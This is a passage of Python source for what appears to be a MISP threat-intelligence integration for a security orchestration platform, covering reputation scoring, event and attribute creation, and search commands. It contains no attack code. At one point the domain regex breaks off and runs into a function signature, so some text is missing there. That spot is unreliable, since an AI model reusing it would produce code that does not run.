\"Please make sure the API key and the URL are correct\" in error:\n return_error('Unable to connect to MISP, '\n 'Please make sure the API key is correct.')\n return_error(error)\n\n\ndef warn(*args):\n \"\"\"\n Do nothing with warnings\n \"\"\"\n pass\n\n\n# Disable requests warnings\nurllib3.disable_warnings()\n\n# Disable python warnings\nwarnings.warn = warn\n\n''' GLOBALS/PARAMS '''\nparams = demisto.params()\nif not params.get('credentials') or not (MISP_API_KEY := params.get('credentials', {}).get('password')):\n raise DemistoException('Missing API Key. 
Fill in a valid key in the integration configuration.')\nMISP_URL = params.get('url')\nVERIFY = not params.get('insecure')\nPROXIES = handle_proxy() # type: ignore\ntry:\n PYMISP = ExpandedPyMISP(url=MISP_URL, key=MISP_API_KEY, ssl=VERIFY, proxies=PROXIES)\nexcept PyMISPError as e:\n handle_connection_errors(e.message)\n\nPREDEFINED_FEEDS = {\n 'CIRCL': {'name': 'CIRCL OSINT Feed',\n 'url': 'https://www.circl.lu/doc/misp/feed-osint',\n 'format': 'misp',\n 'input': 'network'},\n 'Botvrij.eu': {'name': 'The Botvrij.eu Data',\n 'url': 'http://www.botvrij.eu/data/feed-osint',\n 'format': 'misp',\n 'input': 'network'}\n}\n\nTHREAT_LEVELS_TO_ID = {\n 'High': 1,\n 'Medium': 2,\n 'Low': 3,\n 'Unknown': 4\n}\n\nMISP_ENTITIES_TO_CONTEXT_DATA = {\n 'deleted': 'Deleted',\n 'category': 'Category',\n 'comment': 'Comment',\n 'uuid': 'UUID',\n 'sharing_group_id': 'SharingGroupID',\n 'timestamp': 'LastChanged',\n 'to_ids': 'ToIDs',\n 'value': 'Value',\n 'event_id': 'EventID',\n 'ShadowAttribute': 'ShadowAttribute',\n 'disable_correlation': 'DisableCorrelation',\n 'distribution': 'Distribution',\n 'type': 'Type',\n 'id': 'ID',\n 'date': 'CreationDate',\n 'info': 'Info',\n 'published': 'Published',\n 'attribute_count': 'AttributeCount',\n 'proposal_email_lock': 'ProposalEmailLock',\n 'locked': 'Locked',\n 'publish_timestamp': 'PublishTimestamp',\n 'event_creator_email': 'EventCreatorEmail',\n 'name': 'Name',\n 'analysis': 'Analysis',\n 'threat_level_id': 'ThreatLevelID',\n 'old_id': 'OldID',\n 'org_id': 'OrganizationID',\n 'Org': 'Organization',\n 'Orgc': 'OwnerOrganization',\n 'orgc_uuid': 'OwnerOrganization.UUID',\n 'orgc_id': 'OwnerOrganization.ID',\n 'orgc_name': 'OwnerOrganization.Name',\n 'event_uuid': 'EventUUID',\n 'proposal_to_delete': 'ProposalToDelete',\n 'description': 'Description',\n 'version': 'Version',\n 'Object': 'Object',\n 'object_id': 'ObjectID',\n 'object_relation': 'ObjectRelation',\n 'template_version': 'TemplateVersion',\n 'template_uuid': 'TemplateUUID',\n 'meta-category': 'MetaCategory',\n 'decay_score': 'DecayScore',\n 'first_seen': 'first_seen',\n 'last_seen': 'last_seen',\n 'provider': 'Provider',\n 'source_format': 'SourceFormat',\n 'url': 'URL',\n 'event_uuids': 'EventUUIDS',\n}\n\nMISP_ANALYSIS_TO_IDS = {\n 'initial': 0,\n 'ongoing': 1,\n 'completed': 2\n}\n\nMISP_DISTRIBUTION_TO_IDS = {\n 'Your_organization_only': 0,\n 'This_community_only': 1,\n 'Connected_communities': 2,\n 'All_communities': 3,\n 'Inherit_event': 5\n}\n\nSIGHTING_TYPE_NAME_TO_ID = {\n 'sighting': 0,\n 'false_positive': 1,\n 'expiration': 2\n}\n\nSIGHTING_TYPE_ID_TO_NAME = {\n '0': 'sighting',\n '1': 'false_positive',\n '2': 'expiration'\n}\n\nINDICATOR_TYPE_TO_DBOT_SCORE = {\n 'FILE': DBotScoreType.FILE,\n 'URL': DBotScoreType.URL,\n 'DOMAIN': DBotScoreType.DOMAIN,\n 'IP': DBotScoreType.IP,\n 'EMAIL': DBotScoreType.EMAIL,\n}\n\nDOMAIN_REGEX = (\n r\"([a-z¡-\\uffff0-9](?:[a-z¡-\\uffff0-9-]{0,61}\"\n \"[a-z¡-\\uffff0-9])?(?:\\\\.(?!-)[a-z¡-\\uffff0-9-]{1,63}(? 
List[dict]:\n \"\"\"\n Extracting errors raised by PYMISP into readable response, for more information and examples\n please see UT: test_extract_error.\n\n Args:\n error: list of responses from error section\n\n Returns:\n List[Dict[str, any]]: filtered response\n \"\"\"\n return [{\n 'code': err[0],\n 'message': err[1].get('message'),\n 'errors': err[1].get('errors')\n } for err in error]\n\n\ndef dict_to_generic_object_format(args: dict) -> List[dict]:\n \"\"\"\n Converts args dict into a list, please see GenericObjectGenerator Class in Pymisp.\n Args:\n args: dictionary describes MISP object\n\n Returns:\n list: list containing dicts that GenericObjectGenerator can take.\n\n Examples:\n >>> {'ip': '8.8.8.8', 'domain': 'google.com'}\n [{'ip': '8.8.8.8'}, {'domain': 'google.com'}]\n \"\"\"\n return [{k: v} for k, v in args.items()]\n\n\ndef build_generic_object(template_name: str, args: List[dict]) -> GenericObjectGenerator:\n \"\"\"\n\n Args:\n template_name: template name as described in https://github.com/MISP/misp-objects\n args: arguments to create the generic object\n\n Returns:\n GenericObjectGenerator: object created in MISP\n\n Example:\n args should look like:\n [{'analysis_submitted_at': '2018-06-15T06:40:27'},\n {'threat_score': {value=95, to_ids=False}},\n {'permalink': 'https://panacea.threatgrid.com/mask/samples/2e445ef5389d8b'},\n {'heuristic_raw_score': 7.8385159793597}, {'heuristic_score': 96},\n {'original_filename': 'juice.exe'}, {'id': '2e445ef5389d8b'}] # guardrails-disable-line\n \"\"\"\n misp_object = GenericObjectGenerator(template_name)\n misp_object.generate_attributes(args)\n return misp_object\n\n\ndef misp_convert_timestamp_to_date_string(timestamp: Union[str, int]) -> str:\n \"\"\"\n Gets a timestamp from MISP response (1546713469) and converts it to human readable format\n \"\"\"\n return datetime.utcfromtimestamp(int(timestamp)).strftime('%Y-%m-%dT%H:%M:%SZ') if timestamp else \"\"\n\n\ndef replace_keys_from_misp_to_context_data(obj_to_build: Union[dict, list, str]) -> Union[dict, list, str]:\n \"\"\"\n Replacing keys from MISP's format to Demisto's (as appear in ENTITIESDICT)\n\n Args:\n obj_to_build (Union[dict, list, str]): object to replace keys in\n\n Returns:\n Union[dict, list, str]: same object type that got in\n \"\"\"\n if isinstance(obj_to_build, list):\n return [replace_keys_from_misp_to_context_data(item) for item in obj_to_build]\n if isinstance(obj_to_build, dict):\n return {\n (MISP_ENTITIES_TO_CONTEXT_DATA[key] if key in MISP_ENTITIES_TO_CONTEXT_DATA else key):\n replace_keys_from_misp_to_context_data(value) for key, value in obj_to_build.items()\n }\n return obj_to_build\n\n\ndef reputation_command_to_human_readable(outputs, score, events_to_human_readable):\n found_tag_id, found_tag_name = \"\", \"\"\n for event in events_to_human_readable:\n # removing those fields as they are shared by the events\n found_tag_id = event.pop('Tag_ID')\n found_tag_name = event.pop('Tag_Name')\n return {\n 'Attribute Type': outputs[0].get('Type'),\n 'Dbot Score': score,\n 'Attribute Value': outputs[0].get('Value'),\n 'Attribute Category': outputs[0].get('Category'),\n 'Timestamp': outputs[0].get('Timestamp'),\n 'Events with the scored tag': events_to_human_readable,\n 'Scored Tag ID': found_tag_id,\n 'Scored Tag Name': found_tag_name,\n }\n\n\ndef limit_tag_output_to_id_and_name(attribute_dict, is_event_level):\n \"\"\"\n As tag list can be full of in unnecessary data, we want to limit this list to include only the ID and Name fields.\n In addition, 
returns set of the found tag ids.\n\n Some tags have a field called inherited. When it is set to 1 it says that it is an event's tag.\n Otherwise (if it is set to 0 or not exists) it says that it is an attribute's tag.\n If the data is event's (is_event_level = true) we would like to add to tag_set_ids all the tags\n (event ones and the event's attribute tags ones as it is part of the event scope).\n If the data is attribute's (is_event_level = false), and the tag is only related to an attribute\n we would like to add it to tag_set_ids. In any other case, we won't add the tag.\n\n Args:\n attribute_dict (dict): The dictionary that includes the tag list.\n is_event_level (bool): Whether the attribute_dict was received from an event object,\n meaning the tags are event's ones. Otherwise, the data is attribute's (attribute tags).\n \"\"\"\n output = []\n tag_set_ids = set()\n tags_list = attribute_dict.get('Tag', [])\n for tag in tags_list:\n is_event_tag = tag.get('inherited', 0) # field doesn't exist when this is an attribute level, default is '0'\n tag_id = tag.get('id')\n if is_event_level:\n tag_set_ids.add(tag_id)\n else: # attribute level\n if not is_event_tag:\n tag_set_ids.add(tag_id)\n output.append({'ID': tag_id, 'Name': tag.get('name')})\n return output, tag_set_ids\n\n\ndef parse_response_reputation_command(misp_response, malicious_tag_ids, suspicious_tag_ids, attributes_limit):\n \"\"\"\n After getting all the attributes which match the required indicator value, this function parses the response.\n This function goes over all the attributes that found (after limit the attributes amount to the given limit)\n and by sub-functions calculated the score of the indicator.\n For the context data outputs, for every attribute we remove the \"Related Attribute\" list and limits the tags and\n galaxies lists. 
Eventually, the outputs will be a list of attributes along with their events objects.\n Note: When limits the attributes amount, we sort the attributes list by the event ids as the greater event ids are\n the newer ones.\n\n Returns:\n response (dict): The parsed outputs to context data (array of attributes).\n score: the indicator score\n found_tag: the tag (id) which made the indicator to get that score\n found_related_events (dict): contains info (name, id, threat level id) about all the events that include\n the indicator\n\n Please see an example for a response in test_data/reputation_command_response.json\n Please see an example for a parsed output in test_data/reputation_command_outputs.json\n \"\"\"\n response = copy.deepcopy(misp_response)\n attributes_list = response.get('Attribute')\n if not attributes_list:\n return None\n attributes_list = sorted(attributes_list,\n key=lambda attribute_item: attribute_item['event_id'], reverse=True)[:attributes_limit]\n found_related_events, attributes_tag_ids, event_tag_ids = prepare_attributes_array_to_context_data(attributes_list)\n attribute_in_event_with_bad_threat_level = found_event_with_bad_threat_level_id(found_related_events)\n score, found_tag = get_score(attribute_tags_ids=attributes_tag_ids, event_tags_ids=event_tag_ids,\n malicious_tag_ids=malicious_tag_ids, suspicious_tag_ids=suspicious_tag_ids,\n is_attribute_in_event_with_bad_threat_level=attribute_in_event_with_bad_threat_level)\n formatted_response = replace_keys_from_misp_to_context_data({'Attribute': attributes_list})\n return formatted_response, score, found_tag, found_related_events\n\n\ndef prepare_attributes_array_to_context_data(attributes_list):\n attributes_tag_ids, event_tag_ids = set(), set()\n found_related_events = {}\n if not attributes_list:\n return None\n for attribute in attributes_list:\n attribute.pop(\"RelatedAttribute\") # get rid of this useless list\n event = attribute.get('Event')\n convert_timestamp_to_readable(attribute, event)\n found_related_events[event.get(\"id\")] = {\"Event Name\": event.get(\"info\"),\n \"Threat Level ID\": event.get('threat_level_id'),\n \"Event ID\": event.get(\"id\")}\n if event.get('Tag'):\n limit_tag_output, tag_ids = limit_tag_output_to_id_and_name(event, True)\n event['Tag'] = limit_tag_output\n event_tag_ids.update(tag_ids)\n if attribute.get('Tag'):\n limit_tag_output, tag_ids = limit_tag_output_to_id_and_name(attribute, False)\n attribute['Tag'] = limit_tag_output\n attributes_tag_ids.update(tag_ids)\n return found_related_events, attributes_tag_ids, event_tag_ids\n\n\ndef convert_timestamp_to_readable(attribute, event):\n if attribute.get('timestamp'):\n attribute['timestamp'] = misp_convert_timestamp_to_date_string(attribute.get('timestamp'))\n if event:\n if event.get('timestamp'):\n attribute['Event']['timestamp'] = misp_convert_timestamp_to_date_string(event.get('timestamp'))\n if event.get('publish_timestamp'):\n attribute['Event']['publish_timestamp'] = misp_convert_timestamp_to_date_string(\n event.get('publish_timestamp'))\n\n\ndef found_event_with_bad_threat_level_id(found_related_events):\n bad_threat_level_ids = [\"1\", \"2\", \"3\"]\n for event in found_related_events.values():\n if event['Threat Level ID'] in bad_threat_level_ids:\n return True\n return False\n\n\ndef get_score(attribute_tags_ids, event_tags_ids, malicious_tag_ids, suspicious_tag_ids,\n is_attribute_in_event_with_bad_threat_level):\n \"\"\"\n Calculates the indicator score by following logic. 
Indicators of attributes and Events that:\n * have tags which configured as malicious will be scored 3 (i.e malicious).\n * have tags which configured as suspicious will be scored 2 (i.e suspicious).\n * don't have any tags configured as suspicious nor malicious will be scored by their event's threat level id. In\n such case, the score will be BAD if the threat level id is in [1,2,3]. Otherwise, the threat level is 4 = Unknown.\n note:\n - In case the same tag appears in both Malicious tag ids and Suspicious tag ids lists the indicator will\n be scored as malicious.\n - Attributes tags (both malicious and suspicious) are stronger than events' tags.\n \"\"\"\n found_tag = None\n is_attribute_tag_malicious = any((found_tag := tag) in attribute_tags_ids for tag in malicious_tag_ids)\n if is_attribute_tag_malicious:\n return Common.DBotScore.BAD, found_tag\n\n is_attribute_tag_suspicious = any((found_tag := tag) in attribute_tags_ids for tag in suspicious_tag_ids)\n if is_attribute_tag_suspicious:\n return Common.DBotScore.SUSPICIOUS, found_tag\n\n is_event_tag_malicious = any((found_tag := tag) in event_tags_ids for tag in malicious_tag_ids)\n if is_event_tag_malicious:\n return Common.DBotScore.BAD, found_tag\n\n is_event_tag_suspicious = any((found_tag := tag) in event_tags_ids for tag in suspicious_tag_ids)\n if is_event_tag_suspicious:\n return Common.DBotScore.SUSPICIOUS, found_tag\n\n # no tag was found\n if is_attribute_in_event_with_bad_threat_level:\n return Common.DBotScore.BAD, None\n\n return Common.DBotScore.NONE, None\n\n\ndef get_new_misp_event_object(args):\n \"\"\"\n Create a new MISP event object and set the event's details.\n \"\"\"\n event = MISPEvent()\n event.distribution = MISP_DISTRIBUTION_TO_IDS[args.get('distribution')]\n threat_level_id_arg = args.get('threat_level_id')\n if threat_level_id_arg:\n event.threat_level_id = THREAT_LEVELS_TO_ID[threat_level_id_arg]\n analysis_arg = args.get('analysis')\n event.analysis = MISP_ANALYSIS_TO_IDS.get(analysis_arg) if analysis_arg in MISP_ANALYSIS_TO_IDS else analysis_arg\n event.info = args.get('info') if args.get('info') else 'Event from XSOAR'\n event.date = datetime.today()\n event.published = argToBoolean(args.get('published', 'False'))\n return event\n\n\ndef create_event_command(demisto_args: dict):\n \"\"\"Creating event in MISP with the given attribute args\"\"\"\n new_event = get_new_misp_event_object(demisto_args)\n new_event = PYMISP.add_event(new_event, True)\n\n if isinstance(new_event, dict) and new_event.get('errors'):\n raise DemistoException(new_event.get('errors'))\n\n event_id = new_event.id\n add_attribute(event_id=event_id, internal=True, new_event=new_event, demisto_args=demisto_args)\n event = PYMISP.search(eventid=event_id)\n human_readable = f\"## MISP create event\\nNew event with ID: {event_id} has been successfully created.\\n\"\n\n return CommandResults(\n readable_output=human_readable,\n outputs_prefix='MISP.Event',\n outputs_key_field='ID',\n outputs=build_events_search_response(event),\n raw_response=event\n )\n\n\ndef add_attribute(event_id: int = None, internal: bool = False, demisto_args: dict = {}, new_event: MISPEvent = None):\n \"\"\"Adding attribute to a given MISP event object\n This function can be called as an independence command or as part of another command (create event for example)\n\n Args:\n event_id (int): Event ID to add attribute to\n internal (bool): if set to True, will not post results to Demisto\n demisto_args (dict): Demisto args\n new_event (MISPEvent): When this 
function was called from create event command, the attrubite will be added to\n that existing event.\n \"\"\"\n attributes_args = {\n 'id': demisto_args.get('event_id'), # misp event id\n 'type': demisto_args.get('type', 'other'),\n 'category': demisto_args.get('category', 'External analysis'),\n 'to_ids': argToBoolean(demisto_args.get('to_ids', True)),\n 'comment': demisto_args.get('comment'),\n 'value': demisto_args.get('value')\n }\n event_id = event_id if event_id else arg_to_number(demisto_args.get('event_id'), \"event_id\")\n attributes_args.update({'id': event_id}) if event_id else None\n distribution = demisto_args.get('distribution')\n attributes_args.update({'distribution': MISP_DISTRIBUTION_TO_IDS[distribution]}) if distribution else None\n\n if not new_event:\n response = PYMISP.search(eventid=event_id, pythonify=True)\n if not response:\n raise DemistoException(\n f\"Error: An event with the given id: {event_id} was not found in MISP. please check it once again\")\n new_event = response[0] # response[0] is MISP event\n\n new_event.add_attribute(**attributes_args)\n PYMISP.update_event(event=new_event)\n if internal:\n return\n\n value = attributes_args.get('value')\n updated_event = PYMISP.search(eventid=new_event.id, controller='attributes', value=value)\n human_readable = f\"## MISP add attribute\\nNew attribute: {value} was added to event id {new_event.id}.\\n\"\n return CommandResults(\n readable_output=human_readable,\n outputs_prefix='MISP.Attribute',\n outputs_key_field='ID',\n outputs=build_attributes_search_response(updated_event),\n raw_response=updated_event\n )\n\n\ndef generic_reputation_command(demisto_args, reputation_type, dbot_type, malicious_tag_ids, suspicious_tag_ids,\n reliability, attributes_limit):\n reputation_value_list = argToList(demisto_args.get(reputation_type), ',')\n command_results = []\n for value in reputation_value_list:\n command_results.append(\n get_indicator_results(value, dbot_type, malicious_tag_ids, suspicious_tag_ids, reliability,\n attributes_limit))\n return command_results\n\n\ndef reputation_value_validation(value, dbot_type):\n if dbot_type == 'FILE':\n # hashFormat will be used only in output\n hash_format = get_hash_type(value)\n if hash_format == 'Unknown':\n raise DemistoException('Invalid hash length, enter file hash of format MD5, SHA-1 or SHA-256')\n if dbot_type == 'IP':\n if not is_ip_valid(value):\n raise DemistoException(f\"Error: The given IP address: {value} is not valid\")\n if dbot_type == 'DOMAIN':\n if not re.compile(DOMAIN_REGEX, regexFlags).match(value):\n raise DemistoException(f\"Error: The given domain: {value} is not valid\")\n if dbot_type == 'URL':\n if not re.compile(urlRegex, regexFlags).match(value):\n raise DemistoException(f\"Error: The given url: {value} is not valid\")\n if dbot_type == 'EMAIL':\n if not re.compile(emailRegex, regexFlags).match(value):\n raise DemistoException(f\"Error: The given email address: {value} is not valid\")\n\n\ndef get_indicator_results(value, dbot_type, malicious_tag_ids, suspicious_tag_ids, reliability, attributes_limit):\n \"\"\"\n This function searches for the given attribute value in MISP and then calculates it's dbot score.\n The score is calculated by the tags ids (attribute tags and event tags).\n Args:\n value (str): The indicator value (an IP address, email address, domain, url or file hash).\n dbot_type (str): Indicator type (file, url, domain, email or ip).\n malicious_tag_ids (set): Tag ids should be recognised as malicious.\n suspicious_tag_ids (set): Tag 
ids should be recognised as suspicious\n reliability (DBotScoreReliability): integration reliability score.\n attributes_limit (int) : Limits the number of attributes that will be written to the context\n\n Returns:\n CommandResults includes all the indicator results.\n \"\"\"\n reputation_value_validation(value, dbot_type)\n misp_response = PYMISP.search(value=value, controller='attributes', include_context=True,\n include_correlations=True, include_event_tags=True, enforce_warninglist=True,\n include_decay_score=True, includeSightings=True)\n indicator_type = INDICATOR_TYPE_TO_DBOT_SCORE[dbot_type]\n is_indicator_found = misp_response and misp_response.get('Attribute')\n if is_indicator_found:\n outputs, score, found_tag, found_related_events = parse_response_reputation_command(misp_response,\n malicious_tag_ids,\n suspicious_tag_ids,\n attributes_limit)\n dbot = Common.DBotScore(indicator=value, indicator_type=indicator_type,\n score=score, reliability=reliability, malicious_description=\"Match found in MISP\")\n indicator = get_dbot_indicator(dbot_type, dbot, value)\n all_attributes = outputs.get('Attribute')\n events_to_human_readable = get_events_related_to_scored_tag(all_attributes, found_tag)\n attribute_highlights = reputation_command_to_human_readable(all_attributes, score, events_to_human_readable)\n readable_output = tableToMarkdown(f'Results found in MISP for value: {value}', attribute_highlights,\n removeNull=True)\n readable_output += tableToMarkdown('Related events', list(found_related_events.values()))\n return CommandResults(indicator=indicator,\n raw_response=misp_response,\n outputs=all_attributes,\n outputs_prefix='MISP.Attribute',\n outputs_key_field='ID',\n readable_output=readable_output)\n else:\n dbot = Common.DBotScore(indicator=value, indicator_type=indicator_type,\n score=Common.DBotScore.NONE, reliability=reliability,\n malicious_description=\"No results were found in MISP\")\n indicator = get_dbot_indicator(dbot_type, dbot, value)\n return CommandResults(indicator=indicator,\n readable_output=f\"No attributes found in MISP for value: {value}\")\n\n\ndef get_events_related_to_scored_tag(all_attributes, found_tag):\n \"\"\"\n This function searches for all the events that have the tag (i.e found_tag) which caused the indicator to be scored\n as malicious or suspicious.\n Args:\n all_attributes (dict): The parsed response from the MISP search attribute request\n found_tag (str): The tag that was scored as malicious or suspicious. If no tag was found, then the score is\n Unknown so no events should be found.\n\n Returns:\n list includes all the events that were detected as related to the tag.\n \"\"\"\n scored_events = []\n if found_tag:\n for attribute in all_attributes:\n event = attribute.get('Event', {})\n event_name = event.get('Info')\n scored_events.extend(search_events_with_scored_tag(event, found_tag, event_name))\n scored_events.extend(search_events_with_scored_tag(attribute, found_tag, event_name))\n return remove_duplicated_related_events(scored_events)\n\n\ndef remove_duplicated_related_events(related_events):\n related_events_no_duplicates = []\n for i in range(len(related_events)):\n if related_events[i] not in related_events[i + 1:]:\n related_events_no_duplicates.append(related_events[i])\n return related_events_no_duplicates\n\n\ndef search_events_with_scored_tag(object_data_dict, found_tag, event_name):\n \"\"\"\n By the given object we go over all the tags and search if found_tag is one of it's tags. 
If so, the event will be\n added to related_events list\n Args:\n object_data_dict (dict): Event or attribute dict which includes tags list.\n found_tag (str): The tag that was scored as malicious or suspicious.\n event_name (str): Name of the event\n \"\"\"\n related_events = []\n object_tags_list = object_data_dict.get('Tag', [])\n for tag in object_tags_list:\n if tag.get('ID') == found_tag:\n event_id = get_event_id(object_data_dict)\n tag_name = tag.get('Name')\n related_events.append({'Event_ID': event_id, 'Event_Name': event_name,\n 'Tag_Name': tag_name, 'Tag_ID': tag.get('ID')})\n return related_events\n\n\ndef get_event_id(data_dict):\n if data_dict.get('EventID'):\n return data_dict.get('EventID')\n elif data_dict.get('ID'):\n return data_dict.get('ID')\n return data_dict.get('Event', {}).get('ID')\n\n\ndef get_dbot_indicator(dbot_type, dbot_score, value):\n if dbot_type == \"FILE\":\n hash_type = get_hash_type(value)\n if hash_type == 'md5':\n return Common.File(dbot_score=dbot_score, md5=value)\n if hash_type == 'sha1':\n return Common.File(dbot_score=dbot_score, sha1=value)\n if hash_type == 'sha256':\n return Common.File(dbot_score=dbot_score, sha256=value)\n if dbot_type == \"IP\":\n return Common.IP(ip=value, dbot_score=dbot_score)\n if dbot_type == \"DOMAIN\":\n return Common.Domain(domain=value, dbot_score=dbot_score)\n if dbot_type == \"EMAIL\":\n return Common.EMAIL(address=value, dbot_score=dbot_score)\n if dbot_type == \"URL\":\n return Common.URL(url=value, dbot_score=dbot_score)\n\n\ndef build_misp_complex_filter(demisto_query: str):\n \"\"\"\n Examples are available in UT: test_build_misp_complex_filter.\n For more information please see build_complex_query in pymisp/api.py\n\n Args:\n demisto_query: complex query contains saved words: 'AND:', 'OR:' and 'NOT:'\n using ',' as delimiter for parameters and ';' as delimiter for operators.\n using the operators is optional.\n if 'demisto_query' does not contains any of the complex operators the original\n input will be returned\n\n Returns:\n str: dictionary created for misp to perform complex query\n or if no complex query found returns the original input\n \"\"\"\n\n regex_and = r'(AND:)([^\\;]+)(;)?'\n regex_or = r'(OR:)([^\\;]+)(;)?'\n regex_not = r'(NOT:)([^\\;]+)(;)?'\n misp_query_params = dict()\n\n match_and = re.search(regex_and, demisto_query, re.MULTILINE)\n match_or = re.search(regex_or, demisto_query, re.MULTILINE)\n match_not = re.search(regex_not, demisto_query, re.MULTILINE)\n\n is_complex_and_operator = is_misp_complex_search_helper(match_and, misp_query_params, 'and_parameters')\n is_complex_or_operator = is_misp_complex_search_helper(match_or, misp_query_params, 'or_parameters')\n is_complex_not_operator = is_misp_complex_search_helper(match_not, misp_query_params, 'not_parameters')\n is_complex_search = is_complex_and_operator or is_complex_or_operator or is_complex_not_operator\n if is_complex_search:\n return PYMISP.build_complex_query(**misp_query_params)\n return demisto_query\n\n\ndef is_misp_complex_search_helper(match_operator, misp_query_params, operator_key):\n is_complex_search = False\n if match_operator is not None:\n misp_query_params[operator_key] = match_operator.group(2).split(',')\n is_complex_search = True\n return is_complex_search\n\n\ndef prepare_args_to_search(controller):\n demisto_args = demisto.args()\n args_to_misp_format = {arg: demisto_args[arg] for arg in MISP_SEARCH_ARGUMENTS if arg in demisto_args}\n # Replacing keys and values from Demisto to Misp's keys\n if 'type' in 
args_to_misp_format:\n args_to_misp_format['type_attribute'] = args_to_misp_format.pop('type')\n if 'to_ids' in args_to_misp_format:\n args_to_misp_format['to_ids'] = 1 if demisto_args.get('to_ids') == 'true' else 0\n if 'from' in args_to_misp_format:\n args_to_misp_format['date_from'] = args_to_misp_format.pop('from')\n if 'to' in args_to_misp_format:\n args_to_misp_format['date_to'] = args_to_misp_format.pop('to')\n if 'event_id' in args_to_misp_format:\n args_to_misp_format['eventid'] = argToList(args_to_misp_format.pop('event_id'))\n if 'last' in args_to_misp_format:\n args_to_misp_format['publish_timestamp'] = args_to_misp_format.pop('last')\n if 'include_decay_score' in args_to_misp_format:\n args_to_misp_format['include_decay_score'] = 1 if demisto_args.get('include_decay_score') == 'true' else 0\n if 'include_sightings' in args_to_misp_format:\n args_to_misp_format['include_sightings'] = 1 if demisto_args.get('include_sightings') == 'true' else 0\n if 'include_correlations' in args_to_misp_format:\n args_to_misp_format['include_correlations'] = 1 if demisto_args.get('include_correlations') == 'true' else 0\n if 'enforceWarninglist' in args_to_misp_format:\n args_to_misp_format['enforceWarninglist'] = 1 if demisto_args.get('enforceWarninglist') == 'true' else 0\n if 'include_feed_correlations' in args_to_misp_format:\n args_to_misp_format['includeFeedCorrelations'] = 1 if demisto_args.get(\n 'include_feed_correlations') == 'true' else 0\n args_to_misp_format.pop('include_feed_correlations')\n if 'limit' not in args_to_misp_format:\n args_to_misp_format['limit'] = '50'\n if 'tags' in args_to_misp_format:\n args_to_misp_format['tags'] = build_misp_complex_filter(args_to_misp_format['tags'])\n args_to_misp_format['controller'] = controller\n demisto.debug(f\"[MISP V3]: args for {demisto.command()} command are {args_to_misp_format}\")\n return args_to_misp_format\n\n\ndef build_attributes_search_response(response: Union[dict, requests.Response],\n include_correlations=False) -> dict:\n \"\"\"\n Convert the response of attribute search returned from MISP to the context output format.\n \"\"\"\n response_object = copy.deepcopy(response)\n if include_correlations:\n # return full related attributes only if the user wants to get them back\n ATTRIBUTE_FIELDS.append('RelatedAttribute')\n\n if isinstance(response_object, str):\n response_object = json.loads(json.dumps(response_object))\n attributes = response_object.get('Attribute')\n return get_limit_attribute_search_outputs(attributes)\n\n\ndef get_limit_attribute_search_outputs(attributes):\n for i in range(len(attributes)):\n attributes[i] = {key: attributes[i].get(key) for key in ATTRIBUTE_FIELDS if key in attributes[i]}\n build_galaxy_output(attributes[i])\n build_tag_output(attributes[i])\n build_sighting_output_from_attribute_search_response(attributes[i])\n convert_timestamp_to_readable(attributes[i], None)\n formatted_attributes = replace_keys_from_misp_to_context_data(attributes)\n return formatted_attributes\n\n\ndef build_galaxy_output(given_object):\n \"\"\"given_object is attribute or event, depends on the called function\"\"\"\n if given_object.get('Galaxy'):\n given_object['Galaxy'] = [\n {\n 'name': star.get('name'),\n 'type': star.get('type'),\n 'description': star.get('description')\n } for star in given_object['Galaxy']\n ]\n\n\ndef build_object_output(event):\n if event.get('Object'):\n event['Object'] = [\n {\n 'name': event_object.get('name'),\n 'uuid': event_object.get('uuid'),\n 'description': 
event_object.get('description'),\n 'id': event_object.get('id')\n } for event_object in event['Object']\n ]\n\n\ndef build_tag_output(given_object):\n \"\"\"given_object is attribute or event, depends on the called function\"\"\"\n if given_object.get('Tag'):\n given_object['Tag'] = [\n {'Name': tag.get('name'),\n 'is_galaxy': tag.get('is_galaxy')\n } for tag in given_object.get('Tag')\n ]\n\n\ndef build_sighting_output_from_attribute_search_response(attribute):\n if attribute.get('Sighting'):\n attribute['Sighting'] = [\n {'type': sighting.get('type')\n } for sighting in attribute.get('Sighting')\n ]\n\n\ndef build_attributes_search_response_return_only_values(response_object: Union[dict, requests.Response]) -> list:\n \"\"\"returns list of attributes' values that match the search query when user set the arg 'compact' to True\"\"\"\n if isinstance(response_object, str):\n response_object = json.loads(json.dumps(response_object))\n attributes = response_object.get('Attribute')\n return [attribute.get('value') for attribute in attributes]\n\n\ndef pagination_args_validation(page, limit):\n if page and page < 0:\n raise DemistoException(\"page should be zero or a positive number\")\n if limit and limit < 0:\n raise DemistoException(\"limit should be zero or a positive number\")\n\n\ndef attribute_response_to_markdown_table(response: dict):\n attribute_highlights = []\n for attribute in response:\n event = attribute.get('Event', {})\n attribute_tags = [tag.get('Name') for tag in attribute.get('Tag')] if attribute.get(\n 'Tag') else None\n attribute_sightings = [SIGHTING_TYPE_ID_TO_NAME[sighting.get('Type')] for sighting in\n attribute.get('Sighting')] if attribute.get('Sighting') else None\n attribute_highlights.append({\n 'Attribute ID': attribute.get('ID'),\n 'Event ID': attribute.get('EventID'),\n 'Attribute Category': attribute.get('Category'),\n 'Attribute Type': attribute.get('Type'),\n 'Attribute Comment': attribute.get('Comment'),\n 'Attribute Value': attribute.get('Value'),\n 'Attribute Tags': attribute_tags,\n 'Attribute Sightings': attribute_sightings,\n 'To IDs': attribute.get('ToIDs'),\n 'Timestamp': attribute.get('Timestamp'),\n 'Event Info': event.get('Info'),\n 'Event Organization ID': event.get('OrganizationID'),\n 'Event Distribution': event.get('Distribution'),\n 'Event UUID': event.get('UUID')\n })\n return attribute_highlights\n\n\ndef search_attributes(demisto_args: dict) -> CommandResults:\n \"\"\"Execute a MISP search over 'attributes'\"\"\"\n args = prepare_args_to_search('attributes')\n outputs_should_include_only_values = argToBoolean(demisto_args.get('compact', False))\n include_correlations = argToBoolean(demisto_args.get('include_correlations', False))\n page = arg_to_number(demisto_args.get('page', 1), \"page\", required=True)\n limit = arg_to_number(demisto_args.get('limit', 50), \"limit\", required=True)\n pagination_args_validation(page, limit)\n\n response = PYMISP.search(**args)\n if response:\n if outputs_should_include_only_values:\n response_for_context = build_attributes_search_response_return_only_values(response)\n number_of_results = len(response_for_context)\n md = tableToMarkdown(f\"MISP search-attributes returned {number_of_results} attributes\",\n response_for_context[:number_of_results], [\"Value\"])\n else:\n response_for_context = build_attributes_search_response(response, include_correlations)\n attribute_highlights = attribute_response_to_markdown_table(response_for_context)\n\n pagination_message = f\"Current page size: {limit}\\n\"\n if 
